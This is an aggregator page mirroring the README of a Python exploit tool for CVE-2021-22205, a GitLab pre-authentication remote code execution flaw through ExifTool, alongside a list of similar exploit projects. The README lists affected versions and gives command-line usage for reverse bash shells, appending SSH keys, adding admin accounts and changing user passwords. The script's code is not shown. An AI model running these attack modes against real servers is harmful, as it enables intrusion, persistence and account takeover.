GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → inspiringz → CVE-2021-22205

inspiringz / CVE-2021-22205

Licence: other
GitLab CE/EE Preauth RCE using ExifTool

Programming Languages

python
139335 projects - #7 most used programming language

Labels

securitygitlabexploitpentest-scriptscve-2021-22205preauth-rce

Projects that are alternatives of or similar to CVE-2021-22205

Gitlab rce
RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 and LFI for old gitlab versions 10.4 - 12.8.1
Stars: ✭ 104 (-36.97%)
Mutual labels:  gitlab, exploit
pwn-pulse
Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)
Stars: ✭ 126 (-23.64%)
Mutual labels:  exploit, pentest-scripts
cache
Aplus Framework Cache Library
Stars: ✭ 18 (-89.09%)
Mutual labels:  gitlab
break-fast-serial
A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs
Stars: ✭ 53 (-67.88%)
Mutual labels:  exploit
10-days-of-git-and-github
asabeneh.github.io/10-days-of-git-and-github/
Stars: ✭ 786 (+376.36%)
Mutual labels:  gitlab
getroot
🛠️ Tool to bypass my school's security system to get sudo privileges on MacOS
Stars: ✭ 34 (-79.39%)
Mutual labels:  exploit
gitcolombo
🧬 Extract and analyze contributors info from git repos
Stars: ✭ 55 (-66.67%)
Mutual labels:  gitlab
CVE-2018-2380
PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM
Stars: ✭ 55 (-66.67%)
Mutual labels:  exploit
overflow
A command-line tool for exploiting stack-based buffer overflow vulnerabilities.
Stars: ✭ 66 (-60%)
Mutual labels:  exploit
shu-shell
Webshell Jumping Edition
Stars: ✭ 23 (-86.06%)
Mutual labels:  exploit
SAP vulnerabilities
DoS PoC's for SAP products
Stars: ✭ 47 (-71.52%)
Mutual labels:  exploit
gitlabr
An R client for the GitLab API
Stars: ✭ 31 (-81.21%)
Mutual labels:  gitlab
moadsd-ng
The MOADSD-NG project does provide a simple way to setup a hybrid cloud security demo, playground and learning environment within the clouds.
Stars: ✭ 13 (-92.12%)
Mutual labels:  gitlab
GitLabCLI
Cross platform GitLab CLI tool
Stars: ✭ 28 (-83.03%)
Mutual labels:  gitlab
gitlab-vagrant
Basic GitLab Vagrant Environment
Stars: ✭ 30 (-81.82%)
Mutual labels:  gitlab
phpcs-gitlab
Gitlab Report for PHP_CodeSniffer (display the violations in the Gitlab CI/CD Code Quality Report)
Stars: ✭ 29 (-82.42%)
Mutual labels:  gitlab
tickety-tick
A browser extension that helps you name branches and write better commit messages
Stars: ✭ 55 (-66.67%)
Mutual labels:  gitlab
go-zero-looklook
🔥基于go-zero(go zero) 微服务全技术栈开发最佳实践项目。Develop best practice projects based on the full technology stack of go zero (go zero) microservices.
Stars: ✭ 2,691 (+1530.91%)
Mutual labels:  gitlab
YappyGitLab
A GitLab monitor bot for Discord
Stars: ✭ 51 (-69.09%)
Mutual labels:  gitlab
minecraft-log4j-honeypot
Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam
Stars: ✭ 89 (-46.06%)
Mutual labels:  exploit
View All Similar Projects ➔

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

Features

  • Gitlab version detection through the hash in Webpack manifest.json

  • Automatical out-of-band interactions with DNSLog & PostBin RequestBin

  • Support Reverse Bash Shell / Append SSH Key to authorized_keys

  • Support ENTER to modify and restore gitlab user password

Usage

🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via requestbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
  • The site_url parameter format: http[s]://<domain|ip>[:port]/, such as: https://example.com:9000/
  • Methods(rce2,add) marked by * is unstable, may not work :(
  • You can modify the script content according to the actual environment

Screenshot

Detect:

image-20220116233646585

RCE(Echo via RequestBin OOB):

image-20220116234003576

Reverse Bash Shell:

image-20211111131442470

Append SSH Key to authorized_keys:

image-20211111133555010

Gitlab user password modification and restoration:

image-20211111132115090

Reference

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].